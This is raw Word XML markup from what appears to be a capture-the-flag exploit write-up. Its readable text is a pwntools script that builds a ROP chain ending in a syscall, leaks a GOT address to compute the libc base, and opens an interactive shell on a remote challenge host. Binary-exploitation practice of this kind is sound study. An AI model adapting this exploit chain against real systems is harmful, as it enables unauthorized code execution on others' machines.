              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>#gotGets = p64(binary.got.gets)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40ECCE5E" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="57B5C23D" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>#mainAddr = p64(0x00400621)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t># Address of first line in main</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72E9930C" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="05BB1AFD" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7607177A" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="091C8CAC" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>pld = cyclic(40)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="274D64F3" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>pld += retGdgt + popRDI + datRDI + popRSI + datRSI + junk + popRDX + datRDX + junk + popRAX + datRAX + syscall + retGdgt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F26762C" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>return pld</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61906327" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7B38C1F4" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>def pwnRemote(p):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B75B855" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.recvuntil("tools..")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E2D771B" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.sendline(mainLinePld())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="313F4C08" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6454A73F" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>print(p.recvline())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EA0FBA6" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>addr = p.recvline()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20E2C807" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>log.info(addr)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37207B47" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>leak = u64(addr.ljust(8, b'\x00'))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74261840" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>log.info("gots leak - " + hex(leak))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="747D37B2" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="02CEAFF6" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>#libcBase = leak - 0xf7a50 + 0x100000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E41336D" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>libcBase = leak - 0x00083970</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="365ECC3E" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>log.info("libcBase - " + hex(libcBase))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DCE49BA" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1DEF514B" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.recvuntil("tools..")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="010E734E" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.sendline(pwnPLD_libc2(libcBase))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="226A2EA3" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.interactive()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E8BD8A3" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3602DE1D" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>def remotePwn():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="270FC81E" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p = remote(HOST, PORT)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="237CE89D" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>pwnRemote(p)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09F48DFB" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.interactive()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05F7797B" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="01FC0601" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t># leakPuts()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C7F0F2F" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t># getPutsAddr()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7176481A" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t># getOffset()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61B90FF8" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t># testLocalPld()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13A6871F" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>#testLeak()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="769A648F" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>#remoteMainline()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C10B9E9" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>#remoteLeak()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48B8F224" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>#test()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A2E2864" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>#localPwn()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57D071F2" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>#remotePwn()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72B04739" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>#testLeak()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FA94EA4" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4FC69FAB" w14:textId="55BFA192" w:rsidR="00DD6B18" w:rsidRPr="00E23C61" w:rsidRDefault="00DD6B18" w:rsidP="00DD6B18">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0CA187E7" w14:textId="03C76E3C" w:rsidR="00C677DB" w:rsidRDefault="00C677DB" w:rsidP="00200143"/>
    <w:sectPr w:rsidR="00C677DB" w:rsidSect="00110356">
      <w:headerReference w:type="default" r:id="rId19"/>
      <w:footerReference w:type="default" r:id="rId20"/>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559E4" w14:textId="77777777" w:rsidR="00110356" w:rsidRDefault="00110356" w:rsidP="003719FB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="71F59A22" w14:textId="77777777" w:rsidR="00110356" w:rsidRDefault="00110356" w:rsidP="0037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710138"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="7DB0BE8A" w14:textId="089F4E6E" w:rsidR="003719FB" w:rsidRDefault="00371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A178" w14:textId="4746AEE7" w:rsidR="003719FB" w:rsidRDefault="003719FB" w:rsidP="003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724E1" w14:textId="77777777" w:rsidR="00110356" w:rsidRDefault="00110356" w:rsidP="003719FB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7EE2EC2F" w14:textId="77777777" w:rsidR="00110356" w:rsidRDefault="00110356" w:rsidP="0037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DD09C" w14:textId="53F5078E" w:rsidR="00D139EB" w:rsidRDefault="00D139EB">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:t>0</w:t>
    </w:r>
    <w:r w:rsidR="00E676B6">
      <w:t>3</w:t>
    </w:r>
    <w:r w:rsidR="0015734B">
      <w:t>/13</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071"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="038EDD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D7C9E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FCDAEABE"/>
    <w:lvl w:ilvl="0" w:tplc="3222CDB8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="BAD613CC" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="E954BE1C" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="DE7E439C" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="0D0C041E" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="417C892E" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="210E7A5A" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="71264316" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="F7C85430" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="076E3EDA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E3CA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7C5B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0F62A26C"/>
    <w:lvl w:ilvl="0" w:tplc="1D6E5BCC">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="1532628A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="DF7414D2" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0CA448D4" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="6E22819E" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
